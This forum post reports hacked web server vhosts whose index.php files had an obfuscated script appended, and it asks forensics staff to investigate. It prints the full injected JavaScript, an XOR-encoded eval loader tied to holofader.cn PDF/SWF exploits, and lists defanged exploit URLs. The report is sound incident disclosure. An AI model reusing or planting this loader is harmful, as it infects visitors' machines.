cancel
Showing results for 
Search instead for 
Did you mean: 
asotsiaal
Level 7

Beware: pdf/swf exploit - server used holofader.cn

Forensics team - please investigate!

I found on my LAMP server several vhosts being hacked. All index.php files were appended with the following script. (included)

My personal (honeypot) PC (with IE8) resolved the hash and made an automatic query to the following addresses:

hxxp://holofader.cn/3/moreBook.swf
hxxp://holofader.cn/3/sByBook.pdf

Possibly the PC is compromized already.

---------

<script>zcsgwzlawtk=new Array(34,41,37,51,43,35,40,50,104,49,52,47,50,35,110,100,122,36,41,34,63,120,122,53,37,52,47,54,50,120,48,39,52,102,3
6,52,37,55,43,62,35,49,48,41,123,97,32,52,97,125,48,39,52,102,33,48,47,43,45,42,36,39,52,51,123,97,47,97,125,48,39,52,102,37,40,63,48,60,42,5
3,34,49,50,51,123,97,43,35,97,125,48,39,52,102,45,46,49,41,35,52,34,55,63,63,63,123,97,39,97,125,48,39,52,102,47,45,42,44,36,32,33,34,50,35,1
23,34,41,37,51,43,35,40,50,125,48,39,52,102,53,55,52,48,40,45,55,43,51,62,47,123,97,49,47,34,50,46,97,125,48,39,52,102,36,39,43,52,63,45,55,4
4,50,39,123,97,46,50,50,54,124,105,105,46,41,42,41,32,39,34,35,52,104,37,40,105,117,105,47,40,34,35,62,104,54,46,54,97,125,48,39,52,102,34,37
,39,44,33,50,41,32,43,35,49,123,97,46,35,47,33,46,50,97,125,48,39,52,102,52,46,62,35,36,51,43,42,49,40,123,97,53,50,63,42,35,97,125,48,39,52,
102,40,43,47,34,48,37,35,55,32,33,52,123,97,119,97,125,48,39,52,102,43,42,37,52,62,46,41,35,63,48,37,123,97,34,47,53,54,42,39,63,124,40,41,40
,35,97,125,48,39,52,102,62,62,54,47,50,34,33,33,54,41,123,97,53,52,37,97,125,48,39,52,102,42,55,41,37,48,48,51,45,47,32,123,47,45,42,44,36,32
,33,34,50,35,104,37,52,35,39,50,35,3,42,35,43,35,40,50,110,33,48,47,43,45,42,36,39,52,51,109,36,52,37,55,43,62,35,49,48,41,109,45,46,49,41,35
,52,34,55,63,63,63,109,37,40,63,48,60,42,53,34,49,50,51,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,35,110,53,5
5,52,48,40,45,55,43,51,62,47,106,40,43,47,34,48,37,35,55,32,33,52,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,36,51,50,3
5,110,34,37,39,44,33,50,41,32,43,35,49,106,40,43,47,34,48,37,35,55,32,33,52,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50,52,47,
36,51,50,35,110,52,46,62,35,36,51,43,42,49,40,106,43,42,37,52,62,46,41,35,63,48,37,111,125,42,55,41,37,48,48,51,45,47,32,104,53,35,50,7,50,50
,52,47,36,51,50,35,110,62,62,54,47,50,34,33,33,54,41,106,36,39,43,52,63,45,55,44,50,39,111,125,47,45,42,44,36,32,33,34,50,35,104,36,41,34,63,
104,39,54,54,35,40,34,5,46,47,42,34,110,42,55,41,37,48,48,51,45,47,32,111,125,122,105,53,37,52,47,54,50,120,100,111);cxpexelvhw="";ghaceffafi
=70;lerxenrpuun=eval;ykokgwgpdo=String.fromCharCode;for(ftwktbslnxd in zcsgwzlawtk)cxpexelvhw+=ykokgwgpdo(zcsgwzlawtk[ftwktbslnxd]^ghaceffafi
);lerxenrpuun(cxpexelvhw);</script>

--------------------

Message was edited by: Samantha Price - editing links for the protection of other users.  on 1/16/10 6:43:11 AM CST
0 Kudos